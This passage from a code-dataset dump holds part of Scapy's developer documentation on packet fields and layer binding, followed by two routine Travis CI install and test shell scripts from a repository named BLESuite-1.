layer (the right of '/') can\ngather the values to set the fields to the lower layer (the left of\n'/'). Like previously explained, there is a convenient mechanism to\nspecify the bindings in both directions between two neighboring\nlayers.\n\nOnce again, these informations must be provided to ``bind_layers()``,\nwhich will internally call ``bind_top_down()`` in charge to\naggregate the fields to overload. 
In our case what we need to specify\nis::\n\n bind_layers( Foo, Bar1, {'type':1} )\n bind_layers( Foo, Bar2, {'type':2} )\n\nThen, ``add_payload()`` iterates over the ``overload_fields`` of\nthe upper packet (the payload), get the fields associated to the lower\npacket (by its type) and insert them in ``overloaded_fields``.\n \nFor now, when the value of this field will be requested,\n``getfieldval()`` will return the value inserted in\n``overloaded_fields``.\n\nThe fields are dispatched between three dictionaries:\n\n- ``fields``: fields whose the value have been explicitly set, like\n ``pdst`` in TCP (``pdst='42'``)\n- ``overloaded_fields``: overloaded fields\n- ``default_fields``: all the fields with their default value (these fields \n are initialized according to ``fields_desc`` by the constructor \n by calling ``init_fields()`` ).\n\nIn the following code, we can observe how a field is selected and its\nvalue returned::\n\n def getfieldval(self, attr):\n for f in self.fields, self.overloaded_fields, self.default_fields:\n if f.has_key(attr):\n return f[attr]\n return self.payload.getfieldval(attr)\n\nFields inserted in ``fields`` have the higher priority, then\n``overloaded_fields``, then finally ``default_fields``. Hence, if\nthe field ``type`` is set in ``overloaded_fields``, its value will\nbe returned instead of the value contained in ``default_fields``.\n\n\nWe are now able to understand all the magic behind it!\n\n::\n\n >>> p = Foo()/Bar1(val=0x1337)\n >>> p\n <Foo type=1 |<Bar1 val=4919 |>>\n >>> p.show()\n ###[ Foo ]###\n type= 1\n len= 4\n sep= '\\r\\n'\n ###[ Bar1 ]###\n val= 4919\n \nOur 2 problems have been solved without us doing much: so good to be\nlazy :)\n\nUnder the hood: putting everything together\n-------------------------------------------\n\nLast but not least, it is very useful to understand when each function\nis called when a packet is built::\n\n >>> hexdump(raw(p))\n Packet.str=Foo\n Packet.iter=Foo\n Packet.iter=Bar1\n Packet.build=Foo\n Packet.build=Bar1\n Packet.post_build=Bar1\n Packet.post_build=Foo\n\nAs you can see, it first runs through the list of each field, and then\nbuild them starting from the beginning. Once all layers have been\nbuilt, it then calls ``post_build()`` starting from the end.\n\n\nFields \n======\n\n.. index::\n single: fields\n\nHere's a list of fields that Scapy supports out of the box: \n\nSimple datatypes\n----------------\n\nLegend: \n\n- ``X`` - hexadecimal representation\n- ``LE`` - little endian (default is big endian = network byte order)\n- ``Signed`` - signed (default is unsigned)\n\n::\n\n ByteField \n XByteField \n \n ShortField\n SignedShortField\n LEShortField\n XShortField\n \n X3BytesField # three bytes (in hexad \n \n IntField\n SignedIntField\n LEIntField\n LESignedIntField\n XIntField\n \n LongField\n LELongField\n XLongField\n LELongField\n \n IEEEFloatField\n IEEEDoubleField \n BCDFloatField # binary coded decimal\n \n BitField\n XBitField\n \n BitFieldLenField # BitField specifying a length (used in RTP)\n FlagsField \n FloatField\n\nEnumerations\n------------\n\nPossible field values are taken from a given enumeration (list, dictionary, ...) 
\ne.g.::\n\n ByteEnumField(\"code\", 4, {1:\"REQUEST\",2:\"RESPONSE\",3:\"SUCCESS\",4:\"FAILURE\"})\n\n::\n\n EnumField(name, default, enum, fmt = \"H\")\n CharEnumField\n BitEnumField\n ShortEnumField\n LEShortEnumField\n ByteEnumField\n IntEnumField\n SignedIntEnumField\n LEIntEnumField\n XShortEnumField\n\nStrings\n-------\n\n::\n\n StrField(name, default, fmt=\"H\", remain=0, shift=0)\n StrLenField(name, default, fld=None, length_from=None, shift=0):\n StrFixedLenField\n StrNullField\n StrStopField\n\nLists and lengths\n-----------------\n\n::\n\n FieldList(name, default, field, fld=None, shift=0, length_from=None, count_from=None)\n # A list assembled and dissected with many times the same field type\n \n # field: instance of the field that will be used to assemble and disassemble a list item\n # length_from: name of the FieldLenField holding the list length\n \n FieldLenField # holds the list length of a FieldList field\n LEFieldLenField\n \n LenField # contains len(pkt.payload)\n \n PacketField # holds packets\n PacketLenField # used e.g. in ISAKMP_payload_Proposal\n PacketListField\n\n\nVariable length fields\n^^^^^^^^^^^^^^^^^^^^^^\n\nThis is about how fields that have a variable length can be handled with Scapy. These fields usually know their length from another field. Let's call them varfield and lenfield. The idea is to make each field reference the other so that when a packet is dissected, varfield can know its length from lenfield when a packet is assembled, you don't have to fill lenfield, that will deduce its value directly from varfield value.\n\nProblems arise when you realize that the relation between lenfield and varfield is not always straightforward. Sometimes, lenfield indicates a length in bytes, sometimes a number of objects. Sometimes the length includes the header part, so that you must subtract the fixed header length to deduce the varfield length. Sometimes the length is not counted in bytes but in 16bits words. Sometimes the same lenfield is used by two different varfields. Sometimes the same varfield is referenced by two lenfields, one in bytes one in 16bits words.\n\n \nThe length field\n~~~~~~~~~~~~~~~~\n\nFirst, a lenfield is declared using ``FieldLenField`` (or a derivate). If its value is None when assembling a packet, its value will be deduced from the varfield that was referenced. The reference is done using either the ``length_of`` parameter or the ``count_of`` parameter. The ``count_of`` parameter has a meaning only when varfield is a field that holds a list (``PacketListField`` or ``FieldListField``). The value will be the name of the varfield, as a string. According to which parameter is used the ``i2len()`` or ``i2count()`` method will be called on the varfield value. The returned value will the be adjusted by the function provided in the adjust parameter. adjust will be applied to 2 arguments: the packet instance and the value returned by ``i2len()`` or ``i2count()``. 
By default, adjust does nothing::\n\n adjust=lambda pkt,x: x\n\nFor instance, if ``the_varfield`` is a list\n\n::\n\n FieldLenField(\"the_lenfield\", None, count_of=\"the_varfield\")\n\nor if the length is in 16bits words::\n\n FieldLenField(\"the_lenfield\", None, length_of=\"the_varfield\", adjust=lambda pkt,x:(x+1)/2)\n\nThe variable length field\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\nA varfield can be: ``StrLenField``, ``PacketLenField``, ``PacketListField``, ``FieldListField``, ...\n\nFor the two firsts, when a packet is being dissected, their lengths are deduced from a lenfield already dissected. The link is done using the ``length_from`` parameter, which takes a function that, applied to the partly dissected packet, returns the length in bytes to take for the field. For instance::\n\n StrLenField(\"the_varfield\", \"the_default_value\", length_from = lambda pkt: pkt.the_lenfield)\n\nor\n\n::\n\n StrLenField(\"the_varfield\", \"the_default_value\", length_from = lambda pkt: pkt.the_lenfield-12)\n\nFor the ``PacketListField`` and ``FieldListField`` and their derivatives, they work as above when they need a length. If they need a number of elements, the length_from parameter must be ignored and the count_from parameter must be used instead. For instance::\n\n FieldListField(\"the_varfield\", [\"1.2.3.4\"], IPField(\"\", \"0.0.0.0\"), count_from = lambda pkt: pkt.the_lenfield)\n\nExamples\n^^^^^^^^\n\n::\n\n class TestSLF(Packet):\n fields_desc=[ FieldLenField(\"len\", None, length_of=\"data\"),\n StrLenField(\"data\", \"\", length_from=lambda pkt:pkt.len) ]\n \n class TestPLF(Packet):\n fields_desc=[ FieldLenField(\"len\", None, count_of=\"plist\"),\n PacketListField(\"plist\", None, IP, count_from=lambda pkt:pkt.len) ]\n \n class TestFLF(Packet):\n fields_desc=[ \n FieldLenField(\"the_lenfield\", None, count_of=\"the_varfield\"), \n FieldListField(\"the_varfield\", [\"1.2.3.4\"], IPField(\"\", \"0.0.0.0\"), \n count_from = lambda pkt: pkt.the_lenfield) ]\n\n class TestPkt(Packet):\n fields_desc = [ ByteField(\"f1\",65),\n ShortField(\"f2\",0x4244) ]\n def extract_padding(self, p):\n return \"\", p\n \n class TestPLF2(Packet):\n fields_desc = [ FieldLenField(\"len1\", None, count_of=\"plist\",fmt=\"H\", adjust=lambda pkt,x:x+2),\n FieldLenField(\"len2\", None, length_of=\"plist\",fmt=\"I\", adjust=lambda pkt,x:(x+1)/2),\n PacketListField(\"plist\", None, TestPkt, length_from=lambda x:(x.len2*2)/3*3) ]\n\nTest the ``FieldListField`` class::\n \n >>> TestFLF(\"\\x00\\x02ABCDEFGHIJKL\")\n <TestFLF the_lenfield=2 the_varfield=['65.66.67.68', '69.70.71.72'] |<Raw load='IJKL' |>>\n\n\nSpecial\n-------\n\n::\n\n Emph # Wrapper to emphasize field when printing, e.g. Emph(IPField(\"dst\", \"127.0.0.1\")),\n \n ActionField\n \n ConditionalField(fld, cond)\n # Wrapper to make field 'fld' only appear if\n # function 'cond' evals to True, e.g. 
\n # ConditionalField(XShortField(\"chksum\",None),lambda pkt:pkt.chksumpresent==1)\n \n \n PadField(fld, align, padwith=None) \n # Add bytes after the proxified field so that it ends at\n # the specified alignment from its beginning\n\nTCP/IP\n------\n\n::\n\n IPField\n SourceIPField\n \n IPoptionsField\n TCPOptionsField\n \n MACField\n DestMACField(MACField)\n SourceMACField(MACField)\n ARPSourceMACField(MACField)\n \n ICMPTimeStampField\n\n802.11\n------\n\n::\n\n Dot11AddrMACField\n Dot11Addr2MACField\n Dot11Addr3MACField\n Dot11Addr4MACField\n Dot11SCField\n\nDNS\n---\n\n::\n\n DNSStrField\n DNSRRCountField\n DNSRRField\n DNSQRField\n RDataField\n RDLenField\n\nASN.1\n-----\n\n::\n\n ASN1F_element\n ASN1F_field\n ASN1F_INTEGER\n ASN1F_enum_INTEGER\n ASN1F_STRING\n ASN1F_OID\n ASN1F_SEQUENCE\n ASN1F_SEQUENCE_OF\n ASN1F_PACKET\n ASN1F_CHOICE\n\nOther protocols\n---------------\n\n::\n\n NetBIOSNameField # NetBIOS (StrFixedLenField) \n \n ISAKMPTransformSetField # ISAKMP (StrLenField) \n \n TimeStampField # NTP (BitField)\n\n\nDesign patterns\n===============\nSome patterns are similar to a lot of protocols and thus can be described the same way in Scapy.\n\nThe following parts will present several models and conventions that can be followed when implementing a new protocol.\n\nField naming convention\n-----------------------\nThe goal is to keep the writing of packets fluent and intuitive. The basic instructions are the following :\n\n* Use inverted camel case and common abbreviations (e.g. len, src, dst, dstPort, srcIp).\n* Wherever it is either possible or relevant, prefer using the names from the specifications. This aims to help newcomers to easily forge packets.\n" }, { "alpha_fraction": 0.5877862572669983, "alphanum_fraction": 0.6030534505844116, "avg_line_length": 20.129032135009766, "blob_id": "7bb1cf40acc3e813d9ae13f8bb6f670fead0121b", "content_id": "6e1b9d329605e7741c7c51a988fdb0c0840029d6", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 655, "license_type": "permissive", "max_line_length": 66, "num_lines": 31, "path": "/scapy/.travis/test.sh", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "if [ \"$TRAVIS_OS_NAME\" = \"linux\" ]\nthen\n # Linux\n UT_FLAGS=\" -K tshark\" # TODO: also test as root ?\n if [ \"$TRAVIS_SUDO\" != \"true\" ]\n then\n # Linux non root\n UT_FLAGS+=\" -K manufdb\"\n fi\n # pypy\n if python --version 2>&1 | grep -q PyPy\n then\n # cryptography requires PyPy >= 2.6, Travis CI uses 2.5.0\n UT_FLAGS+=\" -K crypto -K not_pypy\"\n fi\nelif [ \"$TRAVIS_OS_NAME\" = \"osx\" ]\nthen\n UT_FLAGS=\" -K tcpdump\"\nfi\n\nif [[ $TOXENV == py3* ]]\nthen\n # Some Python 3 tests currently fail. 
They should be tracked and\n # fixed.\n UT_FLAGS+=\" -K FIXME_py3\"\nfi\n\n# Dump Environment (so that we can check PATH, UT_FLAGS, etc.)\nset\n\ntox -- $UT_FLAGS\n" }, { "alpha_fraction": 0.6388888955116272, "alphanum_fraction": 0.6533816456794739, "avg_line_length": 25.70967674255371, "blob_id": "382f98774e96f5ebcf7f6899252d93125f0aad8f", "content_id": "98747a8f21f1275333ac0b133c0def071397ba62", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 828, "license_type": "permissive", "max_line_length": 139, "num_lines": 31, "path": "/scapy/.travis/install.sh", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# Detect the pip version\nPIP=`which pip || (python --version 2>&1 | grep -q 'Python 2' && which pip2) || (python --version 2>&1 | grep -q 'Python 3' && which pip3)`\n\n# Install Python3 on osx\nif [ \"$TRAVIS_OS_NAME\" = \"osx\" ] && ! python3\nthen\n brew upgrade python\n pip3 install tox\n if [ ! -z $SCAPY_USE_PCAPDNET ]\n then\n brew update\n brew install libdnet libpcap\n fi\n exit 0\nfi\n\n# Install wireshark data\nif [ \"$TRAVIS_OS_NAME\" = \"linux\" ] && [ \"$TRAVIS_SUDO\" = \"true\" ]\nthen\n sudo apt-get -qy install tshark\n sudo apt-get -qy install can-utils build-essential linux-headers-$(uname -r);\nfi\n\n# Install pcap & dnet\nif [ ! -z $SCAPY_USE_PCAPDNET ] && [ \"$TRAVIS_OS_NAME\" = \"linux\" ]\nthen\n $SCAPY_SUDO apt-get -qy install libdumbnet-dev libpcap-dev\nfi\n\n# Make sure tox is installed and up to date\n$PIP install -U tox\n" } ]
38
garbas/pypi2nix
https://github.com/garbas/pypi2nix
47909d79f44b06d63d52780989d89c5e4094488c
4a5a9d399e960d85b3e37b6a564bcbe655287e3c
c14585a236b582a843511326ca3bb0c616556075
refs/heads/master
2021-05-22T04:13:11.331122
2021-04-01T10:01:11
2021-04-01T10:01:11
4,310,097
128
35
null
null
null
null
null
[ { "alpha_fraction": 0.5974025726318359, "alphanum_fraction": 0.5974025726318359, "avg_line_length": 37.5, "blob_id": "1e69d689a7070310a7f897dfff17b54981ded4d9", "content_id": "8d01913a6d6411c8dd67d430a1b48048a8203416", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 77, "license_type": "no_license", "max_line_length": 38, "num_lines": 2, "path": "/src/pypi2nix/nix_language.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "def escape_string(string: str) -> str:\n return string.replace('\"', '\\\\\"')\n" }, { "alpha_fraction": 0.7471264600753784, "alphanum_fraction": 0.7471264600753784, "avg_line_length": 28.33333396911621, "blob_id": "5b19bab45cb69f7e59b95eea4aac7e74f132a90d", "content_id": "3e162dcf2d6595c10b0dbe333002d3e354e44997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 87, "license_type": "no_license", "max_line_length": 68, "num_lines": 3, "path": "/pytest.ini", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "[pytest]\nmarkers =\n nix: marks tests that that cannot run inside a nix build sandbox" }, { "alpha_fraction": 0.8771929740905762, "alphanum_fraction": 0.8771929740905762, "avg_line_length": 39.71428680419922, "blob_id": "b6681404435440d9b2f0d09a6103fac39f61792e", "content_id": "3c230bf9445f61a114b2d4fe0a23aa74be60eb6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 285, "license_type": "no_license", "max_line_length": 47, "num_lines": 7, "path": "/src/pypi2nix/package/__init__.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .exceptions import DistributionNotDetected\nfrom .interfaces import HasBuildDependencies\nfrom .interfaces import HasPackageName\nfrom .interfaces import HasRuntimeDependencies\nfrom .metadata import PackageMetadata\nfrom .pyproject import PyprojectToml\nfrom .setupcfg import SetupCfg\n" }, { "alpha_fraction": 0.707317054271698, "alphanum_fraction": 0.707317054271698, "avg_line_length": 19.5, "blob_id": "e5e23ff1c0c3fae5ee52d35db99ea8d94dd8367e", "content_id": "b60f50ad3f635c01e9a901f17b446bf6a50ba829", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "no_license", "max_line_length": 36, "num_lines": 10, "path": "/src/pypi2nix/external_dependencies/external_dependency.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from attr import attrib\nfrom attr import attrs\n\n\n@attrs(frozen=True)\nclass ExternalDependency:\n _attribute_name: str = attrib()\n\n def attribute_name(self) -> str:\n return self._attribute_name\n" }, { "alpha_fraction": 0.4853801131248474, "alphanum_fraction": 0.4853801131248474, "avg_line_length": 25.30769157409668, "blob_id": "7f10f5c657d469993c17681bd701d49e52833045", "content_id": "3d2f3fc83b484214e5bbb2a4f1e3c62c93096c8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 342, "license_type": "no_license", "max_line_length": 47, "num_lines": 13, "path": "/mypy/venv.pyi", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Optional\n\nclass EnvBuilder:\n def __init__(\n self,\n system_site_packages: bool = ...,\n clear: bool = ...,\n symlinks: bool = ...,\n upgrade: bool = ...,\n with_pip: bool = ...,\n prompt: Optional[str] = None,\n ) -> None: ...\n def create(self, env_dir: str) -> None: ...\n" }, { 
"alpha_fraction": 0.6968085169792175, "alphanum_fraction": 0.6968085169792175, "avg_line_length": 30.33333396911621, "blob_id": "6daf5d083f7125ec68daa339ea8771216d57ba68", "content_id": "4054cbc713a55f3d74113f25916d9d1b16231ee0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 376, "license_type": "no_license", "max_line_length": 58, "num_lines": 12, "path": "/integrationtests/test_lektor.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\nfrom .framework import TestCommand\n\n\nclass LektorTestCase(IntegrationTest):\n name_of_testcase = \"lektor\"\n code_for_testing = [\"import lektor\"]\n requirements = [\"Lektor\"]\n external_dependencies = [\"libffi\", \"openssl\", \"unzip\"]\n\n def executables_for_testing(self):\n return [TestCommand(command=[\"lektor\", \"--help\"])]\n" }, { "alpha_fraction": 0.7007168531417847, "alphanum_fraction": 0.7397849559783936, "avg_line_length": 26.899999618530273, "blob_id": "498e13f16d27a9d685e95f0466182053bf1904ec", "content_id": "7c4a0fb99a3406f0e2cdbcf30e905c8fe4dda432", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2790, "license_type": "permissive", "max_line_length": 113, "num_lines": 100, "path": "/unittests/test_package_source.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom pypi2nix.nix import Nix\nfrom pypi2nix.package_source import GitSource\nfrom pypi2nix.package_source import HgSource\nfrom pypi2nix.package_source import PathSource\nfrom pypi2nix.package_source import UrlSource\n\nfrom .switches import nix\n\nURL_SOURCE_URL = \"https://github.com/nix-community/pypi2nix/archive/4e85fe7505dd7e703aacc18d9ef45f7e47947a6a.zip\"\nURL_SOURCE_HASH = \"1x3dzqlnryplmxm3z1lnl40y0i2g8n6iynlngq2kkknxj9knjyhv\"\n\n\n@pytest.fixture\ndef git_source():\n return GitSource(\n url=\"https://github.com/nix-community/pypi2nix.git\",\n revision=\"4e85fe7505dd7e703aacc18d9ef45f7e47947a6a\",\n )\n\n\n@pytest.fixture\ndef hg_source(logger):\n return HgSource(\n url=\"https://bitbucket.org/tarek/flake8\", revision=\"a209fb69350c\", logger=logger\n )\n\n\n@pytest.fixture\ndef url_source(logger):\n return UrlSource(url=URL_SOURCE_URL, logger=logger)\n\n\n@pytest.fixture\ndef path_source():\n return PathSource(\"/test/path\")\n\n\n@pytest.fixture\ndef expression_evaluater(logger):\n nix_instance = Nix(logger=logger)\n return lambda expression: nix_instance.evaluate_expression(\n \"let pkgs = import <nixpkgs> {}; in \" + expression\n )\n\n\n@nix\ndef test_git_source_gives_correct_hash_value(git_source):\n assert (\n git_source.hash_value()\n == \"113sngkfi93pdlws1i8kq2rqff10xr1n3z3krn2ilq0fdrddyk96\"\n )\n\n\n@nix\ndef test_git_source_produces_valid_nix_expression(git_source, expression_evaluater):\n expression_evaluater(git_source.nix_expression())\n\n\n@nix\ndef test_hg_source_gives_correct_hash_value(hg_source):\n assert (\n hg_source.hash_value() == \"1n0fzlzmfmynnay0n757yh3qwjd9xxcfi7vq4sxqvsv90c441s7v\"\n )\n\n\n@nix\ndef test_hg_source_produces_valid_nix_expression(hg_source, expression_evaluater):\n expression_evaluater(hg_source.nix_expression())\n\n\n@nix\ndef test_url_source_gives_correct_hash_value(url_source):\n assert url_source.hash_value() == URL_SOURCE_HASH\n\n\n@nix\ndef test_url_source_gives_valid_nix_expression(url_source, expression_evaluater):\n expression_evaluater(url_source.nix_expression())\n\n\ndef 
test_url_source_nix_expression_contains_specified_hash_when_given(logger):\n # We specify the wrong hash on purpose to see that UrlSource just\n # \"accepts\" the given hash and puts it into the generated nix\n # expression\n url_source = UrlSource(\n URL_SOURCE_URL, hash_value=URL_SOURCE_HASH + \"1\", logger=logger\n )\n assert URL_SOURCE_HASH + \"1\" in url_source.nix_expression()\n\n\n@nix\ndef test_path_source_gives_valid_nix_expression(path_source, expression_evaluater):\n expression_evaluater(path_source.nix_expression())\n\n\ndef test_path_source_paths_with_one_segement_get_dot_appended_for_nix():\n source = PathSource(\"segment\")\n assert source.nix_expression() == \"segment/.\"\n" }, { "alpha_fraction": 0.6243343353271484, "alphanum_fraction": 0.6254639625549316, "avg_line_length": 39.24026107788086, "blob_id": "8d465990d074aeda94c72e87a21124fc66a5824c", "content_id": "4f0e881f11b1d0255b92d162473b60effda150e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6197, "license_type": "no_license", "max_line_length": 93, "num_lines": 154, "path": "/src/pypi2nix/target_platform.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import json\nimport os\nimport shlex\nimport tempfile\nfrom contextlib import contextmanager\nfrom typing import Any\nfrom typing import Dict\nfrom typing import Iterator\nfrom typing import Optional\n\nfrom attr import attrib\nfrom attr import attrs\nfrom packaging.markers import default_environment\n\nfrom pypi2nix.exceptions import UnknownTargetPlatform\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.nix import Nix\nfrom pypi2nix.python_version import PythonVersion\nfrom pypi2nix.python_version import python_version_from_version_string\n\n\nclass PlatformGenerator:\n def __init__(self, nix: Nix, logger: Logger) -> None:\n self.nix = nix\n self.logger = logger\n\n def from_python_version(self, version: PythonVersion) -> \"TargetPlatform\":\n with self._python_environment_nix(version.derivation_name()) as nix_file:\n default_environment_string = self.nix.shell(\n command=\"python -c {command}\".format(\n command=shlex.quote(self._python_command_for_default_environment())\n ),\n derivation_path=nix_file,\n )\n return self._target_platform_from_default_environment_string(\n default_environment_string, python_version=version\n )\n\n def current_platform(self) -> Optional[\"TargetPlatform\"]:\n environment_json_string = json.dumps(default_environment())\n environment = self._load_default_environment(environment_json_string)\n python_version = python_version_from_version_string(\n environment[\"python_version\"]\n )\n if python_version is None:\n return None\n else:\n return self._target_platform_from_default_environment_string(\n environment_json_string, python_version=python_version\n )\n\n def _python_command_for_default_environment(self) -> str:\n return \";\".join(\n [\n \"import json\",\n \"from setuptools._vendor.packaging.markers import default_environment\",\n \"print(json.dumps(default_environment()))\",\n ]\n )\n\n def _target_platform_from_default_environment_string(\n self, json_string: str, python_version: PythonVersion\n ) -> \"TargetPlatform\":\n default_environment = self._load_default_environment(json_string)\n return TargetPlatform(\n python_version=default_environment[\"python_version\"],\n nixpkgs_python_version=python_version,\n python_full_version=default_environment[\"python_full_version\"],\n 
implementation_version=default_environment[\"implementation_version\"],\n os_name=default_environment[\"os_name\"],\n implementation_name=default_environment[\"implementation_name\"],\n sys_platform=default_environment[\"sys_platform\"],\n platform_machine=default_environment[\"platform_machine\"],\n platform_python_implementation=default_environment[\n \"platform_python_implementation\"\n ],\n platform_release=default_environment[\"platform_release\"],\n platform_system=default_environment[\"platform_system\"],\n platform_version=default_environment[\"platform_version\"],\n )\n\n def _load_default_environment(self, json_string: str) -> Dict[str, str]:\n result: Dict[str, str] = dict()\n loaded_json = self._parse_target_platform_string(json_string)\n if not isinstance(loaded_json, dict):\n return result\n for key, value in loaded_json.items():\n if isinstance(key, str) and isinstance(value, str):\n result[key] = value\n return result\n\n def _parse_target_platform_string(self, json_string: str) -> Any:\n try:\n return json.loads(json_string)\n except json.decoder.JSONDecodeError:\n error_message = (\n \"Could not detect target platform, pypi2nix was unable to parse \"\n \"the following string as json: \" + json_string\n )\n self.logger.error(error_message)\n raise UnknownTargetPlatform(error_message)\n\n @contextmanager\n def _python_environment_nix(self, nixpkgs_attribute_name: str) -> Iterator[str]:\n fd, path = tempfile.mkstemp()\n with open(fd, \"w\") as f:\n f.write(\n \" \".join(\n [\n \"with import <nixpkgs> {{}};\",\n \"stdenv.mkDerivation {{\",\n 'name = \"python3-env\";',\n \"buildInputs = with {interpreter}.pkgs; [{interpreter} {packages}];\",\n \"}}\",\n ]\n ).format(interpreter=nixpkgs_attribute_name, packages=\"setuptools\")\n )\n try:\n yield path\n finally:\n os.remove(path)\n\n\n@attrs\nclass TargetPlatform:\n python_version: str = attrib()\n nixpkgs_python_version: PythonVersion = attrib()\n python_full_version: str = attrib()\n implementation_version: str = attrib()\n os_name: str = attrib()\n sys_platform: str = attrib()\n implementation_name: str = attrib()\n platform_machine: str = attrib()\n platform_python_implementation: str = attrib()\n platform_release: str = attrib()\n platform_system: str = attrib()\n platform_version: str = attrib()\n\n def environment_dictionary(self) -> Dict[str, Any]:\n dictionary = {}\n dictionary[\"python_version\"] = self.python_version\n dictionary[\"python_full_version\"] = self.python_full_version\n dictionary[\"implementation_version\"] = self.implementation_version\n dictionary[\"os_name\"] = self.os_name\n dictionary[\"sys_platform\"] = self.sys_platform\n dictionary[\"platform_machine\"] = self.platform_machine\n dictionary[\n \"platform_python_implementation\"\n ] = self.platform_python_implementation\n dictionary[\"platform_release\"] = self.platform_release\n dictionary[\"platform_system\"] = self.platform_system\n dictionary[\"platform_version\"] = self.platform_version\n dictionary[\"implementation_name\"] = self.implementation_name\n return dictionary\n" }, { "alpha_fraction": 0.8039215803146362, "alphanum_fraction": 0.8039215803146362, "avg_line_length": 24.5, "blob_id": "37ddd53f6467c00364d4f5a016cc13ed6c8a6598", "content_id": "cf3aefaf025656eb3d35a06f63d5c0a4d5a00aa3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51, "license_type": "no_license", "max_line_length": 41, "num_lines": 2, "path": "/src/pypi2nix/package/exceptions.py", "repo_name": "garbas/pypi2nix", 
"src_encoding": "UTF-8", "text": "class DistributionNotDetected(Exception):\n pass\n" }, { "alpha_fraction": 0.6046406626701355, "alphanum_fraction": 0.6070513725280762, "avg_line_length": 35.07065200805664, "blob_id": "f322b51f402e99f2209bc2c36b237687f853b914", "content_id": "e72af4577708f21b01c45d56fcb9ecbec39a6d4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6637, "license_type": "no_license", "max_line_length": 188, "num_lines": 184, "path": "/src/pypi2nix/source_distribution.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nfrom typing import Iterable\nfrom typing import Optional\n\nfrom packaging.utils import canonicalize_name\n\nfrom pypi2nix.archive import Archive\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.package import DistributionNotDetected\nfrom pypi2nix.package import HasBuildDependencies\nfrom pypi2nix.package import PackageMetadata\nfrom pypi2nix.package import PyprojectToml\nfrom pypi2nix.package import SetupCfg\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.requirements import Requirement\nfrom pypi2nix.requirements import VersionRequirement\nfrom pypi2nix.target_platform import TargetPlatform\n\n\nclass SourceDistribution(HasBuildDependencies):\n def __init__(\n self,\n name: str,\n logger: Logger,\n requirement_parser: RequirementParser,\n pyproject_toml: Optional[PyprojectToml] = None,\n setup_cfg: Optional[SetupCfg] = None,\n ) -> None:\n self.name = canonicalize_name(name)\n self.pyproject_toml = pyproject_toml\n self.setup_cfg = setup_cfg\n self.logger = logger\n self.requirement_parser = requirement_parser\n\n @property\n def package_format(self) -> str:\n if self.pyproject_toml:\n return \"pyproject\"\n else:\n return \"setuptools\"\n\n @classmethod\n def from_archive(\n source_distribution,\n archive: Archive,\n logger: Logger,\n requirement_parser: RequirementParser,\n ) -> \"SourceDistribution\":\n with archive.extracted_files() as extraction_directory:\n first_level_paths = os.listdir(extraction_directory)\n if len(first_level_paths) != 1:\n raise DistributionNotDetected(\n f\"Multiple package directories or files extracted from {archive}\"\n )\n package_dir = os.path.join(extraction_directory, first_level_paths[0])\n if not os.path.isdir(package_dir):\n raise DistributionNotDetected(\n f\"No package directory could be extracted from source distribution {archive}\"\n )\n extracted_files = [\n os.path.join(package_dir, file_name)\n for file_name in os.listdir(package_dir)\n if os.path.isfile(os.path.join(package_dir, file_name))\n ]\n setup_cfg = source_distribution.get_setup_cfg(\n extracted_files, logger, requirement_parser\n )\n metadata = source_distribution._get_package_metadata(package_dir)\n name = source_distribution._get_name(setup_cfg, metadata, archive)\n pyproject_toml = source_distribution.get_pyproject_toml(\n name, extracted_files, logger, requirement_parser\n )\n return source_distribution(\n name=name,\n pyproject_toml=pyproject_toml,\n setup_cfg=setup_cfg,\n logger=logger,\n requirement_parser=requirement_parser,\n )\n\n @classmethod\n def get_pyproject_toml(\n _,\n name: str,\n extracted_files: Iterable[str],\n logger: Logger,\n requirement_parser: RequirementParser,\n ) -> Optional[PyprojectToml]:\n pyproject_toml_candidates = [\n filepath\n for filepath in extracted_files\n if os.path.basename(filepath) == \"pyproject.toml\"\n ]\n if 
